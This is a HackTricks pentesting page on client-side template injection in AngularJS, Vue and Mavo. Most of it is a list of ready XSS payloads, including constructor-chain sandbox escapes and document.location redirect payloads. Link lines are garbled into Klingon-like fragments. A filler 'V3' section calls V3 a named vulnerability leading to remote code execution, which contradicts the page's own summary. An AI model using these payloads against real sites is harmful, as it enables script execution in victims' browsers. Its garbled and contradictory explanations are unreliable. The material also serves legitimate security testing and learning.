7.9 KiB
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Summary
It is like a Server Side Template Injection but in the client. The SSTI can allow you to execute code on the remote server, the CSTI could allow you to execute arbitrary JavaScript code in the victim.
The way to test for this vulnerability is very similar as in the case of SSTI, the interpreter is going to expect something to execute between doubles keys and will execute it. For example using something like: {{ 7-7 }} if the server is vulnerable you will see a 0 and if not you will see the original: {{ 7-7 }}
AngularJS
AngularJS is a widely-used JavaScript framework that interacts with HTML through attributes known as directives, a notable one being ng-app. This directive allows AngularJS to process the HTML content, enabling the execution of JavaScript expressions inside double curly braces.
In scenarios where user input is dynamically inserted into the HTML body tagged with ng-app, it's possible to execute arbitrary JavaScript code. This can be achieved by leveraging the syntax of AngularJS within the input. Below are examples demonstrating how JavaScript code can be executed:
{{$on.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}
<input ng-focus=$event.view.alert('XSS')>
<!-- Google Research - AngularJS -->
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>
AngularJS-Da vulnerability-Da basic online example-Da yuQjIj http://jsfiddle.net/2zs2yv7o/ 'ej Burp Suite Academy-Da
{% hint style="danger" %}
Angular 1.6 removed the sandbox so from this version a payload like {{constructor.constructor('alert(1)')()}} or <input ng-focus=$event.view.alert('XSS')> should work.
{% endhint %}
VueJS
Vulnerable vue.js-Da implementation-Da yuQjIj https://vue-client-side-template-injection-example.azu.now.sh/
Working payload: https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor(%27alert(%22foo%22)%27)()%7D%
'ej source code-Da vulnerable example-Da yuQjIj https://github.com/azu/vue-client-side-template-injection-example 'ej.
<!-- Google Research - Vue.js-->
"><div v-html="''.constructor.constructor('d=document;d.location.hash.match(\'x1\') ? `` : d.location=`//localhost/mH`')()"> aaa</div>
V3
V3 is a client-side template injection (CSTI) vulnerability that affects applications built with the VUE framework. This vulnerability allows an attacker to inject malicious code into the client-side templates, leading to potential remote code execution.
Exploiting V3
To exploit V3, an attacker needs to identify the injection point in the application's client-side templates. This can be done by analyzing the application's source code or by using automated tools.
Once the injection point is identified, the attacker can craft a payload that will be executed within the client-side template. This payload can include JavaScript code that performs various malicious actions, such as stealing sensitive information or performing unauthorized actions on behalf of the user.
Mitigating V3
To mitigate V3, it is recommended to follow secure coding practices when developing applications with the VUE framework. This includes properly sanitizing user input and validating any data that is used in client-side templates.
Additionally, it is important to keep the VUE framework and any related libraries up to date, as vulnerabilities in these components can be exploited by attackers.
Conclusion
V3 is a serious vulnerability that can lead to remote code execution in applications built with the VUE framework. By understanding how this vulnerability works and following secure coding practices, developers can protect their applications from potential attacks.
{{_openBlock.constructor('alert(1)')()}}
Credit: Gareth Heyes, Lewis Ardern & PwnFunction
V2
{{constructor.constructor('alert(1)')()}}
Credit: Mario Heiderich
Check more VUE payloads in https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected
Mavo
Payload:
[7*7]
[(1,alert)(1)]
<div mv-expressions="{{ }}">{{top.alert(1)}}</div>
[self.alert(1)]
javascript:alert(1)%252f%252f..%252fcss-images
[Omglol mod 1 mod self.alert (1) andlol]
[''=''or self.alert(lol)]
<a data-mv-if='1 or self.alert(1)'>test</a>
<div data-mv-expressions="lolx lolx">lolxself.alert('lol')lolx</div>
<a href=[javascript&':alert(1)']>test</a>
[self.alert(1)mod1]
More payloads in https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations
Brute-Force Detection List
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.